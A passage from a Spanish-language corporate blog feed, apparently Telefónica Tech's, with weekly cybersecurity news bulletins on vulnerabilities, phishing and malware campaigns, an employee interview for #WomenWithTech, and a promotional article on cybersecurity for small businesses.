clientes usar sus propias claves de cifrado para proteger sus datos. Sin embargo, Codefinger ha aprovechado esta característica para cifrar los datos de las víctimas y luego exigir un rescate para proporcionar la clave de descifrado. Los atacantes obtienen las credenciales de AWS de las víctimas, generalmente a través de redes comprometidas o ataques de phishing, y las usan para acceder a los buckets S3 y aplican el cifrado con una clave AES-256 que ellos mismos generan y almacenan localmente. Los atacantes marcan los archivos para ser eliminados en siete días, creando presión para que las víctimas paguen el rescate. Más info
17 de enero de 2025
#WomenWithTech: María construye soluciones con propósito para la digitalización industrial
Cuéntanos un poco sobre ti: ¿quién eres y a qué te dedicas? Soy Maria Garcia, gestora de proyectos en el departamento de digitalización de Geprom, part of Telefónica Tech. Mi trabajo consiste en coordinar y supervisar proyectos tecnológicos de desarrollo de software enfocados a la digitalización y optimización de procesos industriales. ¿Cuál es tu especialización? ¿Cómo llegaste a dedicarte a lo que haces ahora? Mi especialización es la gestión de proyectos. Me encargo de la planificación de tareas técnicas, de la comunicación con el cliente y el seguimiento del avance de los proyectos, entre otros. Empecé en Geprom como técnica y, con el tiempo, me dieron la oportunidad de llevar un pequeño proyecto. Me pareció interesante probarlo para ver si me gustaba y, al final, esa experiencia me llevó a dar el paso y cambiar hacia la gestión de proyectos. ¿Tenías claro que querías dedicarte al mundo de la tecnología desde pequeña? ¿Ha sido algo vocacional? Siempre he tenido claro que quería dedicarme a algo relacionado con la ciencia o la tecnología. Siempre he sido muy curiosa, y desde pequeña me interesaba por entender cómo funcionaban las cosas y si podía recrearlas con lo que tenía a mano. Dedicarme a la tecnología fue una decisión que siempre tuve clara. ¿Qué o quién te motivó a escoger una profesión relacionada con la tecnología? Elegí una profesión relacionada con la tecnología porque me gusta construir soluciones prácticas, que sean útiles en la vida real. Me motiva ver que mi trabajo tiene un propósito y ver cómo se va construyendo poco a poco hasta obtener un resultado final. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Mi trayectoria profesional está siendo un aprendizaje constante. He tenido la oportunidad de ser técnica y gestora de proyectos y de trabajar en proyectos cada vez más grandes. Esto me ha permitido crecer y aprender mucho. En mi día a día es muy importante ser organizado, tener una buena base de conocimiento técnico y saber encontrar las soluciones adecuadas a todo tipo de problemas. Para conciliar intento organizar bien mi tiempo para separar los espacios. Busco tener siempre un hueco para mi entorno y mis hobbies, así puedo desconectar. ¿Qué hace de Telefónica Tech un excelente lugar de trabajo para las mujeres y cómo promueve la empresa la diversidad de género y la inclusión? Su apuesta por la diversidad y la inclusión y ofrecer las mismas oportunidades de crecer profesionalmente, independientemente del género. Personalmente, mi experiencia ha sido muy positiva y además tengo la suerte de trabajar con otras mujeres en mi día a día, que no es muy habitual en el sector. ¿Podrías explicarnos qué significa para ti la iniciativa #WomenWithTech? Para mí #WomenWithTech es una iniciativa que muestra el trabajo que hacemos las mujeres en tecnología. Da una visibilidad que ayuda a que niñas y mujeres se planteen una carrera en el ámbito tecnológico, porqué demuestra que el sector está cambiando y las mujeres tenemos un lugar importante en él. ¿Qué aportamos las mujeres a las profesiones STEAM? Las mujeres somos la mitad de la población, y si no estamos en STEAM significa que se están perdiendo la mitad de las ideas y oportunidades. Además, aportamos diversidad a los equipos y nuevos enfoques. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM y qué habilidades crees que son importantes para tener éxito en el sector de la tecnología? Mi consejo sería que confíen en sí mismas y que no tengan miedo de empezar su carrera. Son sectores muy interesantes y que requieren que te estés actualizando constantemente. Si les gusta una carrera STEAM, seguro que la van a disfrutar mucho. Las mujeres aportamos diversidad a los equipos y nuevos enfoques.
16 de enero de 2025
Boletín Semanal de Ciberseguridad, 4-10 enero
Ivanti alerta sobre dos vulnerabilidades en Connect Secure y otros productos; una bajo explotación activa El proveedor de software Ivanti ha alertado sobre dos vulnerabilidades críticas en sus productos, identificadas como CVE-2025-0282 y CVE-2025-0283. La primera, con una puntuación CVSSv3 de 9.0, permite a atacantes remotos no autenticados ejecutar código arbitrario a través de un desbordamiento de búfer basado en pila y afecta a varias versiones de Ivanti Connect Secure, Policy Secure y Neurons for ZTA Gateways. La segunda, con una puntuación CVSSv3 de 7.0, permite a atacantes locales autenticados escalar privilegios. Una investigación de Mandiant identificó la explotación activa de CVE-2025-0282 desde mediados de diciembre de 2024. Ivanti confirmó que esta vulnerabilidad ya ha sido explotada en dispositivos Connect Secure, aunque afirma no haber evidencia de explotación en Policy Secure ni en ZTA. Para mitigar riesgos, Ivanti recomienda usar su herramienta Integrity Checker Tool (ICT) para detectar compromisos, actualizar a la versión 22.7R2.5 y realizar un análisis con ICT. Además y como medida de precaución, sugiere llevar a cabo un restablecimiento de fábrica antes de implementar la actualización. Más información Actualizaciones de Chrome y Firefox Google y Mozilla han lanzado actualizaciones de seguridad para sus navegadores Chrome y Firefox para corregir varias vulnerabilidades de alta gravedad. Google ha lanzado Chrome 131, actualización que resuelve cuatro vulnerabilidades entre las que destaca CVE-2025-0291 (CVSSv3 8.3), una falla de confusión de tipos en el motor JavaScript V8 que podría permitir a un atacante ejecutar código arbitrario remotamente. Por su parte, Firefox 134 corrige 11 vulnerabilidades, tres de las cuales son de alta gravedad. La más importante es CVE-2025-0247 (CVSSv3 8.8), un problema de corrupción de memoria que podría explotarse para ejecutar código arbitrario. Cabe destacar que ni Google ni Mozilla han detectado explotación activa de estas vulnerabilidades. Más información Se puede eludir el cifrado de Windows 11 gracias a una vieja vulnerabilidad de Bitlocker El investigador de seguridad Thomas Lambertz demostró en el Chaos Communication Congress que la vulnerabilidad de BitLocker conocida popularmente como bitpixie (CVE-2023-21563, CVSSv3 6.8 según Microsoft) puede seguir siendo explotada pese a que la compañía publicó en enero de 2023 un parche. Lambertz demostró cómo es posible eludir el cifrado de BitLocker en Windows 11 sin necesidad de abrir físicamente el PC. El ataque aprovecha un gestor de arranque desactualizado a través de Secure Boot, lo que permite a los atacantes extraer las claves de encriptación. Solo se necesita acceso físico momentáneo al dispositivo y una conexión a la red. Para mitigar el riesgo, se recomienda establecer contraseñas PIN personalizadas para BitLocker o desactivar el acceso a la red a través del BIOS. Sin embargo, incluso un dispositivo USB conectado a la red podría facilitar el ataque. Más información Nueva campaña de phishing de Tycoon 2FA usando falsos mensajes de voz Investigadores de Validin han identificado un nuevo método por el que la plataforma de Phishing-as-a-Service (PhaaS) Tycoon 2FA permite a los ciberdelincuentes lanzar ataques de phishing dirigidos a la autenticación de dos factores (2FA). La plataforma, que ya permite crear plantillas personalizadas que imitan solicitudes legítimas de 2FA y automatiza la gestión de campañas de phishing a gran escala, está siendo utilizada para desplegar campañas en las que se distribuye un archivo HTML con una falsa página de correo de voz antes de redirigir a una falsa página de autenticación de Outlook. El análisis estático muestra variables para almacenar el correo electrónico de la víctima y un blob codificado en Base64, que contiene código HTML de la página falsa y un script JavaScript descargado pasados cuatro segundos desde una dirección URL remota. Sería precisamente este script el que ejecuta acciones maliciosas tras descifrarse usando AES. La investigación del equipo de Validin ha identificado que el archivo PHP res444.php empleado en esta campaña también se utiliza en múltiples dominios, lo que sugiere una infraestructura compartida actualmente activa sobre la que tomar medidas. Más información Actores maliciosos se dirigen a servidores PHP con criptomineros Investigadores de SANS han detectado una dirección URL que se dirigiría a servidores PHP vulnerables, explotando potencialmente el fallo CVE-2024-4577 (CVSSv3 9.8) o configuraciones erróneas que permiten el acceso público a “php-cgi.exe” ejecutando múltiples comandos a través de la función system(). Esta descarga un ejecutable malicioso, denominado “dr0p.exe”, de un servidor remoto para ejecutarlo localmente, e intenta descargar el mismo ejecutable utilizando wget, eludiendo la verificación del certificado SSL. Dicho servidor tendría sede en EE. UU. y alojaría EvilBit Block Explorer en el puerto 80, además de exponer los puertos 22, 110 y 6664. Asimismo, el análisis reveló que el malware lanza packetcrypt.exe, el cual se corresponde probablemente con un minero de criptomonedas, al tiempo que proporciona una dirección de cartera PKT Classic como argumento. La investigación de SANS reveló que la criptomoneda minada en los servidores PHP comprometidos era PKTC, una moneda de prueba de trabajo heredada del proyecto PacketCrypt. Más información ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
10 de enero de 2025
Boletín Semanal de Ciberseguridad, 3 de enero
Publicado un exploit para la vulnerabilidad LDAPNightmare Investigadores de SafeBreach han publicado el código de una prueba de concepto que se aprovecha de la vulnerabilidad CVE-2024-49112 (CVSSv3 9.8), conocida como LDAPNightmare. Se trata de un exploit que causa un DoS en cualquier servidor Windows no parcheado, incluyendo controladores de dominio, a través del envío de peticiones LDAP especialmente modificadas. El exploit desarrollado por SafeBreach puede causar que cualquier servidor Windows no parcheado se bloquee sin necesidad de interacción previa, lo que es especialmente crítico porque los Controladores de Dominio son componentes clave en las redes organizacionales, y una vulnerabilidad en ellos puede afectar gravemente la seguridad de la red. El pasado 10 de diciembre Microsoft publicó el parche para la vulnerabilidad. Más info DoubleClickjacking: técnica emergente para obtener accesos no autorizados Investigadores en ciberseguridad han descubierto una nueva técnica de ataque denominada "DoubleClickjacking", que aprovecha una secuencia de doble clic para superar las protecciones contra clickjacking en sitios web relevantes. Este método, que emplea el intervalo entre clics para manipular elementos de la interfaz de usuario, permite tomar control de cuentas con una interacción mínima, eludiendo defensas como las cabeceras X-Frame-Options o las cookies SameSite. El ataque comienza en un sitio controlado por un atacante que solicita un doble clic en una ventana emergente aparentemente inocua, como un CAPTCHA. Durante el segundo clic, el sitio redirige al usuario de manera encubierta a una página maliciosa, aprobando acciones como la autorización de aplicaciones OAuth maliciosas sin que el usuario sea consciente. Como medida preventiva de concienciación los investigadores proponen deshabilitar la activación de botones críticos a menos que se detecte un gesto del ratón o una tecla con el objetivo de evitar que el segundo clic se active demasiado rápido y autorice a aplicaciones sin conocimiento del usuario hasta que los navegadores adopten estándares que puedan mitigar los efectos no deseados de este nuevo vector de ataque. Más info Ficora y Capsaicin incrementan su actividad dirigiéndose a routers D-Link Investigadores de Fortinet han detectado dos botnets denominadas Ficora, una variante de Mirai, y Capsaicin, variante de Kaiten, las cuales han registrado un aumento de la actividad dirigida a routers D-Link que ejecutan versiones de firmware obsoletas o que han llegado al fin de su vida útil. Para el acceso inicial, ambos malware utilizan exploits conocidos para CVE-2015-2051, CVE-2019-10891, CVE-2022-37056 y CVE-2024-33112. Tras comprometer un dispositivo, los atacantes aprovechan debilidades en la interfaz de administración de D-Link (HNAP) y ejecutan comandos maliciosos a través de GetDeviceSettings con fines de DDoS. Por su parte, las botnet son capaces de ejecutar shell scripts, robar datos y filtrarlos al servidor C2. Ficora tiene una amplia distribución geográfica, dirigiéndose especialmente a Japón y Estados Unidos, mientras que Capsaicin parece dirigirse principalmente a países de Asia Oriental. Se recomienda a los usuarios actualizar los dispositivos a la última versión de firmware disponible, o sustituirlos por un modelo nuevo en caso de no recibir actualizaciones. Más info Cisco confirma que las fugas publicadas por Intelbroker se deberían a la misma intrusión Cisco ha confirmado que la segunda publicación del usuario de BreachForums IntelBroker acerca de una fuga de información de sus sistemas estaría relacionada con la primera de las publicaciones. La nueva fuga no se debería a una nueva intrusión, sino que estaría compuesta por los datos del ataque, también confirmado por Cisco, a sus instancias de desarrollo. Más info Ataque coordinado a extensiones de Google Chrome Varias extensiones de Chrome fueron comprometidas en un ataque coordinado en el cual un actor de amenazas inyectó código para robar información sensible de los usuarios. Uno de los afectados, Cyberhaven, alertó de que un atacante secuestró una cuenta de empleado y publicó una versión maliciosa (24.10.4) de la extensión, la cual incluía código capaz de exfiltrar sesiones autenticadas y cookies al dominio del atacante. Otras extensiones de Chrome afectadas fueron Internxt VPN, VPNCity, Uvoice, ParrotTalks, Bookmark Favicon Changer, Castorus, Wayin AI, Search Copilot AI Assistant, VidHelper, Vidnoz Flex, TinaMind, Primus, AI Shop Buddy, Sort by Oldest, Earny, ChatGPT Assistant, Keyboard History Recorder y Email Hunter. Se recomienda a los usuarios eliminar dichas extensiones o actualizarlas a una versión segura publicada después del 26 de diciembre, siempre que el editor haya solucionado el problema. Alternativamente, se recomienda desinstalar la extensión, restablecer las contraseñas de las cuentas, borrar los datos del navegador y restablecer su configuración original. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
3 de enero de 2025
Boletín Semanal de Ciberseguridad, 21 - 27 diciembre
Nueva campaña de ingeniería social para distribuir malware Malware Bytes ha descubierto una nueva campaña de ingeniería social que se haría pasar por múltiples marcas de software. Los actores maliciosos emplearían páginas web que suplantan a software legítimo el cual, al ser descargado, muestra un fallo en el navegador indicando que este no permite la correcta visualización offline del documento descargado, instando a las víctimas a solucionarlo con “Fix it”. Esta técnica ya ha sido empleada previamente en campañas conocidas como ClearFake y ClickFix, y se caracteriza por requerir la ejecución manual por parte del usuario de un comando de Power Shell que, en este caso, se copia en el portapapeles al hacer click en el botón “Fix it”. Después se insta a pulsar las teclas Windows y R para abrir el cuadro de diálogo del comando Ejecutar, pegar el comando copiado y ejecutarlo. Finalmente, el atacante lleva a cabo actividades de fingerprinting de la víctima y descarga una payload. Más info Parche incompleto en Apache Tomcat lleva al proveedor a publicar un nuevo fallo Apache ha publicado una nueva actualización de seguridad para parchear un fallo en Apache Tomcat que podría permitir la ejecución de código remoto. Se trataría de CVE-2024-56337, detectado por Apache tras parchear de manera incompleta CVE-2024-50379, CVSSv3 9.8. Ambos CVE representan el mismo fallo, pero el proveedor decidió asignar un nuevo ID de CVE. CVE-2024-56337 se debe a que el parche de CVE-2024-50379 no es suficiente para asegurar los sistemas. Ambos son fallos de condición de carrera, concretamente de tiempo de comprobación de tiempo de uso (TOCTOU) y afectan a los sistemas con la escritura de servlets activada por defecto, si estos se ejecutan en sistemas de archivos que no distinguen entre mayúsculas y minúsculas. Más info Detectadas versiones maliciosas de Rspack y Vant Tres paquetes npm populares, @rspack/core, @rspack/cli y Vant, fueron comprometidos mediante tokens de cuenta npm robados, permitiendo la publicación de versiones maliciosas con criptomineros, en un nuevo ataque a la cadena de suministro. Según las investigaciones de Sonatype y Socket, los atacantes desplegaron el minero XMRig para extraer criptoactivos, utilizando scripts postinstalación para ejecutarse automáticamente. Al parecer, el código malicioso estaba oculto en archivos de configuración y obtenía instrucciones de servidores C2. Además, realizaba reconocimiento a través de la API de geolocalización de ipinfo.io, recopilando datos de red. El binario XMRig se descargaba de GitHub y usaba parámetros para limitar el uso de CPU, equilibrando minería y evasión. Rspack, un empaquetador de JavaScript, y Vant, una biblioteca de UI para Vue.js, confirmaron el compromiso de sus cuentas npm y publicaron versiones limpias. Rspack aconseja evitar la versión 1.1.7 y actualizar a la 1.1.8, mientras que Vant señala varias versiones afectadas, recomendando actualizar a v4.9.15 o superior. Más info Corregidas vulnerabilidades críticas en plugins de WordPress Investigadores de PatchStack han identificado múltiples vulnerabilidades críticas en los plugins WPLMS y VibeBP, utilizados por el tema WPLMS de WordPress, un popular sistema de gestión de aprendizaje con más de 28 000 ventas. Entre los fallos destacan una carga arbitraria de archivos, identificado como CVE-2024-56046, CVSSv3 10.0., CVE-2024-56043, CVSSv3 9.8, un fallo de escalada de privilegios, y una vulnerabilidad de inyección SQL, CVE-2024-56042, CVSSv3 9.2. Los fallos afectaban a formularios de registro y puntos finales de la API REST. En total, se reportaron 18 fallos, varios de ellos críticos, exponiendo sitios a la ejecución remota de código, control administrativo no autorizado y fuga de datos sensibles. Los desarrolladores han solucionado los problemas en WPLMS (versión 1.9.9.5.3) y VibeBP (versión 1.9.9.7.7), implementando validaciones más estrictas, limitando cargas de archivos y asegurando entradas. Más info El FBI atribuye a TraderTraitor el robo de más de 300 millones de dólares El FBI y el Centro de Ciberdelincuencia del Departamento de Defensa y la Agencia Nacional de Policía de Japón han publicado un aviso en el que atribuyen el robo de más de 300 millones de dólares en criptomonedas al actor malicioso TraderTraitor. De acuerdo con las autoridades, este actor también habría sido denominado Jade Sleet, UNC4899 y Slow Pisces, y habría sido asociado con el gobierno de Corea del Norte. Respecto al ataque que se le atribuye, se trata de un robo de criptoactivos ocurrido en mayo de 2024 que afectó a la empresa japonesa DMM Bitcoin. El ataque comenzó con el actor malicioso haciéndose pasar por un reclutador en LinkedIn que contactó con un trabajador de la empresa Ginco al que engañó para copiar un código Python malicioso en su GitHub. Este malware permitía a los atacantes infiltrarse en Ginco y moverse lateralmente a DMM. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
27 de diciembre de 2024
Boletín Semanal de Ciberseguridad, 14 - 20 diciembre
Fallo en Apache Struts2 activamente explotado Microsoft Investigadores de ISC han observado que actores maliciosos comenzaron a explotar una vulnerabilidad recién descubierta en Apache Struts2. La vulnerabilidad, registrada como CVE-2024-53677, tiene una puntuación CVSSv4 de 9.5 y es de tipo path-traversal. En caso de explotación, los atacantes podrían cargar archivos en directorios que deberían estar restringidos, lo que podría conducir a la ejecución remota de código u obtener control no autorizado sobre el sistema, si llegaran a cargar un webshell en la raíz web. El fallo parece relacionarse con una vulnerabilidad anterior, CVE-2023-50164, que no se solucionó adecuadamente, dando lugar a la amenaza actual. En este sentido, ISC informó de que los intentos de ataque actuales se han rastreado hasta la dirección IP 169.150.226[.]162. Según Apache, para mitigar el riesgo los usuarios deben pasar a un nuevo mecanismo de Action File Upload. Además, se recomienda supervisar el tráfico de red para identificar y mitigar posibles amenazas. Más info Detectada una campaña “rogue RDP” atribuida a APT29 La APT Earth Koshchei, también denominada APT29 y Midnight Blizzard, fue descubierta en octubre de 2024 llevando a cabo una campaña de ataques “rogue RDP”. De acuerdo con lo publicado por los investigadores de Trend Micro, este tipo de ataques conlleva el uso de un relay RDPD, un servidor RDP falso y un archivo de configuración RDP malicioso, empleados con el objetivo de que los atacantes obtengan acceso al dispositivo de la víctima para robar información o distribuir malware. Aunque la campaña llevaba siendo preparada desde al menos agosto del mismo año, mes en el cual Earth Koshchei comenzó a obtener dominios maliciosos para la operación, el punto álgido de los ataques se detectó el 22 de octubre. Según Trend Micro, este día la APT envió correos de phishing a miembros de gobiernos y de las fuerzas y cuerpos de seguridad, así como investigadores y otros objetivos ucranianos, que contenían el archivo de configuración RDP falso adjunto. Al ejecutarse, el archivo se conectaba a un servidor RDP extranjero operado por Earth Koshchei. Más info Nueva campaña de falsas alertas de actualización distribuye CoinLurker Actores de amenazas están empleando falsas alertas de actualización de software para distribuir un nuevo stealer denominado CoinLurker. Las alertas son enviadas a los usuarios mediante sitios de WordPress comprometidos, correos electrónicos de phishing, redirecciones de publicidad maliciosa, solicitudes de verificación CAPTCHA falsas, descargas directas y enlaces compartidos por redes sociales y aplicaciones de mensajería. Las alertas utilizan Microsoft Edge Webview2 para desencadenar la ejecución de la carga útil. Por su parte, CoinLurker está escrito en Go y emplea técnicas de ofuscación y anti-análisis de última generación, destacando la técnica de EtherHiding. Una vez lanzado, CoinLurker inicia comunicaciones con un servidor remoto utilizando un enfoque basado en sockets y procede a recopilar datos de directorios específicos asociados con Discord, Telegram, FileZilla y billeteras de criptomonedas que incluyen Bitcoin, Ethereum, Ledger Live y Exodus. Más info Detectada una campaña de phishing orientada al robo de credenciales de Microsoft Azure Los investigadores de Unit 42 de Palo Alto Networks han detectado una nueva campaña de phishing dirigida al robo de credenciales de cuentas de infraestructura cloud de Microsoft Azure. Aunque los investigadores han afirmado que la campaña habría comenzado en junio de 2024, esta aún seguía activa en septiembre del mismo año. En concreto, el actor malicioso dirigía sus ataques contra entidades del sector industrial de Alemania y Reino Unido. De esta manera, el atacante enviaba correos electrónicos de phishing a las víctimas que contenían links de HubSpot Free Form Builder y archivos PDF que se hacían pasar por archivos legítimos de DocuSign para redirigir a las víctimas hacia sitios web de robo de credenciales. Asimismo, desde Unit 42 destacan que aproximadamente 20 000 cuentas habrían sido comprometidas durante esta operación. Más info Incremento de ataques password spraying contra dispositivos Citrix Netscaler Recientemente, Cloud Software Group, casa matriz de Citrix, ha detectado un aumento de los ataques de password spraying dirigidos a dispositivos Citrix Netscaler con el propósito de comprometer redes corporativas. Los atacantes emplean nombres de usuario genéricos y un amplio rango de direcciones IP dinámicas, lo que dificulta la eficacia de estrategias de mitigación tradicionales, como el bloqueo de IP y la limitación de velocidad. Además, estos ataques pueden sobrecargar dispositivos configurados para volúmenes normales de autenticación, afectando su disponibilidad. En respuesta, la compañía ha recomendado medidas como implementar autenticación multifactor, bloquear los endpoints pre-nFactor no esenciales y utilizar cortafuegos de aplicaciones web (WAF). Cabe destacar que estas mitigaciones solo aplican a versiones de firmware 13.0 o superiores en entornos locales o en la nube, mientras que los clientes de Gateway Service no requieren acciones adicionales. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
20 de diciembre de 2024
Ciberataques: ¿por qué las pymes son un objetivo prioritario frente a las grandes empresas?
Las pequeñas y medianas empresas (pymes) se han convertido en un objetivo prioritario para los ciberdelincuentes, que han incrementado sus ataques contra ellas en un 250% al ser objetivos más fáciles de atacar que las grandes empresas. Según el informe Hiscox Cyber Readiness Report, el 49% de las pymes españolas admite haber sufrido un ciberataque en 2023 y un 60% se ve forzada a cerrar a consecuencia de un ciberataque. Un 36% de las microempresas, con menos de 10 empleados, ha sufrido un ciberataque. En el Balance de Ciberseguridad 2023 publicado por el Instituto Nacional de Ciberseguridad (Incibe) se refleja un incremento del 24% de los incidentes respecto al año anterior, y el 70% de los ciberataques van dirigidos a pymes. Todos estos datos subrayan la necesidad urgente de mejorar la protección en Ciberseguridad entre las pymes con soluciones eficientes y asequibles como 'Tu Empresa Segura' de Telefónica Tech, un servicio que hemos diseñado para proporcionar a las pymes las herramientas y los conocimientos que necesitan para estar protegidas. Ciberataques más frecuentes contra pymes Entre las principales ciberamenazas que enfrentan hoy en día las pymes, se encuentran: Ataques relacionados con correo electrónico y suplantación de identidad incluyendo el phishing, que es uno de los métodos más utilizados. Los ciberdelincuentes envían mensajes engañosos con enlaces o ficheros maliciosos que, una vez abiertos, infectan los sistemas y permiten el acceso a información y sistemas. ⚠️ Este tipo de ataque genera aproximadamente 3.400 millones de correos spam diarios a nivel mundial. Ransomware: Estos ataques destructivos cifran los datos de la organización, bloqueando el acceso a los mismos y exigiendo un rescate a cambio de las herramientas y claves secretas necesarias para su recuperación. ⚠️ Este tipo de ataque afecta a más del 60% de las organizaciones españolas, demostrando su capacidad devastadora. Malware o software malicioso: Diferentes familias de software malicioso son utilizadas para perjudicar los sistemas, espiar o sacar beneficio. Ejemplos incluyen virus, puertas traseras, grabadores de pulsaciones de teclado y mineros de criptomonedas que operan sin el conocimiento de la empresa, generando beneficios económicos para los actores maliciosos. ⚠️ Estos ataques pueden ser especialmente difíciles de resolver y las pymes pueden tardar más de dos meses en recuperarse completamente. Este fenómeno se debe a varias razones: Recursos limitados: Las pymes suelen tener menos recursos dedicados a la Ciberseguridad en comparación con las grandes empresas. Solo el 61% de las empresas con menos de 250 empleados se sienten seguras de su preparación en Ciberseguridad. Menor concienciación y formación: Muchas pymes carecen de políticas de seguridad robustas y formación adecuada para sus empleados, lo que las hace más vulnerables a técnicas de ingeniería social como el phishing. Infraestructura tecnológica obsoleta: La falta de actualización de sistemas y software puede dejar a las pymes expuestas a vulnerabilidades conocidas. ¿Cuáles son las consecuencias de un ataque exitoso? Un ciberataque exitoso puede tener consecuencias devastadoras para una pyme e incluso poner en riesgo la continuidad de su negocio. Entre los impactos más significativos se encuentran: Coste financiero: Los costes directos de un ataque pueden incluir el pago de rescates en casos de ransomware, gastos en recuperación de datos y sistemas, y la implementación de nuevas medidas de seguridad. ⚠️ El coste medio de un ciberataque para una pyme suele rondar los 35.000 euros. Pérdida de clientes e ingresos: La pérdida de reputación y de la confianza de los clientes puede resultar en una disminución significativa de ingresos. ⚠️ El 60% de las pymes españolas que sufren un ciberataque cierran sus puertas en los seis meses siguientes. Multas y sanciones: Las violaciones de datos pueden resultar en multas significativas por parte de la Agencia Española de Protección de Datos (AEPD) ⚠️ Las sanciones pueden alcanzar hasta 20 millones de euros o el 4% de la facturación anual global de la empresa. Protege tu negocio con 'Tu Empresa Segura' Para mitigar estos riesgos, es fundamental que las pymes adopten soluciones de Ciberseguridad robustas como 'Tu Empresa Segura', nuestra solución integral de Ciberseguridad diseñada por Telefónica Tech para protegerlas frente a las crecientes ciberamenazas. Esta solución adaptada a las necesidades de las pymes, independientemente de su tamaño y actividad, incluye: Herramientas para combatir ciberataques. Soporte y asesoramiento a través del Centro de Seguridad Pyme. Formación y concienciación sobre la importancia de la política de Ciberseguridad para los empleados. Tu Empresa Segura ofrece diferentes niveles de protección adaptados a las necesidades específicas de cada empresa, asegurando que incluso las organizaciones con recursos limitados puedan acceder a una defensa robusta contra ciberataques: Paquete básico que incluye protección esencial como navegación segura, antivirus y antiransomware, y un sistema de correo limpio que filtra spam, malware y phishing en tiempo real. ✅ Estas medidas son fundamentales para prevenir los ataques más comunes y mantener la integridad de los datos y sistemas de la empresa. Paquete avanzado para las empresas que requieren una protección más amplia añadiendo características como trabajo remoto seguro y sede segura, además de programas de concienciación para empleados. ✅ Estas funciones no solo protegen los dispositivos y redes de la empresa, sino que también educan a los empleados sobre las mejores prácticas de Ciberseguridad, reduciendo así el riesgo de ataques exitosos debido a errores humanos. Paquete premium que ofrece la protección más completa, incluyendo servicios adicionales como la protección de servicios en la nube. ✅ Esto es especialmente útil para las empresas que dependen de aplicaciones y almacenamiento en la nube, asegurando que todos los aspectos de su infraestructura digital estén protegidos contra posibles vulnerabilidades. Además, nuestro nuevo paquete de Ciberseguridad gestionada proporciona una solución combinada de EDR (Detección y Respuesta en Endpoint) y de MDR (Detección y Respuesta Gestionada) para monitorizar, detectar, bloquear y remediar en todo momento cualquier incidente de seguridad en los dispositivos digitales (endpoints) y en la nube, proporcionando a las pymes una solución de Ciberseguridad hasta ahora reservada para las grandes empresas. En Telefónica Tech nos apoyamos en las capacidades de nuestro partner Sophos, que identifican automáticamente las amenazas gracias a la monitorización de la actividad de los endpoints y al análisis de los datos en tiempo real, para detectar nuevas amenazas de forma proactiva e intensificar la investigación y la respuesta a incidentes desde nuestra red de Centros de Operaciones de Seguridad (SOC), gestionados por nuestros profesionales de Telefónica Tech. De este modo proporcionamos a las pymes el acompañamiento experto necesario para la puesta en marcha del servicio, su operación y respuesta ante incidentes durante las 24 horas y todos los días de la semana. ✅ Al invertir en este servicio de seguridad gestionado, eficaz y fiable las empresas pueden reducir significativamente el riesgo de ciberataques, mantener la continuidad del negocio y proteger la confianza de sus socios, proveedores y clientes. Contrata Tu Empresa Segura →
17 de diciembre de 2024
Boletín Semanal de Ciberseguridad, 7 - 13 diciembre
Patch Tuesday de Microsoft del mes de diciembre incluye una 0-day activamente explotada Microsoft ha publicado el aviso correspondiente al Patch Tuesday del mes de diciembre, el cual incluye actualizaciones de seguridad para 71 fallos destacando una vulnerabilidad 0-day activamente explotada. En concreto, dicho fallo ha sido registrado como CVE-2024-49138, CVSSv3 de 7.8 según Microsoft, y se trata de una vulnerabilidad de elevación de privilegios en el controlador del sistema de archivos de registro común de Windows y cuyo aprovechamiento por parte de actores maliciosos permite obtener privilegios de SISTEMA en dispositivos Windows. Cabe destacar que no se ha publicado, por el momento, ninguna información sobre cómo se explotó la falla en los ataques, aunque como se estima lo descubrió el equipo de investigación avanzada de CrowdStrike, es probable que próximamente se publique información sobre su explotación. Más info Apple parchea una vulnerabilidad crítica en iOS Con motivo del Patch Tuesday de diciembre, Apple ha publicado nuevos parches de seguridad para solucionar fallos encontrados en dispositivos iOS, iPadOS y macOS. Una de las vulnerabilidades más destacadas es CVE-2024-45490, CVSSv3 9.8 según CISA, que permite a un atacante remoto provocar una finalización inesperada de la aplicación o la ejecución de código arbitrario. Asimismo, la nueva versión actualizada publicada por Apple para iOS, concretamente la 18.2, soluciona un par de fallos en AppleMobileFileIntegrity que permiten a las aplicaciones maliciosas saltarse las protecciones y acceder a datos sensibles de los usuarios. Estos fallos habrían sido denominados CVE-2024-54526 y CVE-2024-54527, y aun no habrían recibido una puntuación CVSS. Por otro lado, en el boletín de actualizaciones de macOS Apple parcheó docenas de fallos del sistema operativo. Más info ShinyHunters y Nemesis vinculados a una operación de robo de credenciales a gran escala Una investigación para vpnMentor identificó una operación de hacking a gran escala vinculada a los actores de amenazas ShinyHunters y Nemesis. Estos explotaron las vulnerabilidades de millones de sitios web y aprovecharon errores de configuración para acceder a información sensible, actuando desde un país francófono. Los atacantes utilizaron varios lenguajes de scripting junto con herramientas especializadas, como ffuf y httpx, para automatizar el proceso de explotación. Asimismo, hicieron uso de Shodan y rangos de direcciones IP de AWS disponibles públicamente para buscar y explotar millones de objetivos en diferentes regiones. La brecha provocó el robo de más de 2 TB de datos, los cuales incluían claves y secretos de clientes de AWS que, a su vez, permitían el acceso a servicios de AWS. También obtuvieron credenciales Git que exponían código fuente y bases de datos sensibles, credenciales SMTP y SMS que facilitaron el envío de correos electrónicos de phishing y spam, credenciales de carteras de criptomonedas y plataformas de negociación, así como accesos a cuentas de redes sociales y correo electrónico. Más info Meeten: campaña contra profesionales de Web3 El equipo de investigadores de Cado Security Labs ha publicado una investigación en la que informan sobre el descubrimiento de una campaña de malware que apunta contra personas que trabajan en Web3 y a la que han denominado Meeten. En concreto, según los expertos, actores maliciosos estarían engañando a sus víctimas mediante la remisión de falsas convocatorias de reuniones profesionales que requieren que accedan a sitios web maliciosos que simulan ser legítimos para la descarga de una aplicación para poder conectarse a la misma. Sin embargo, tanto el software descargado, el cual se trata del malware Realst, así como los sitios web que alojan JavaScript, tienen como objetivo el 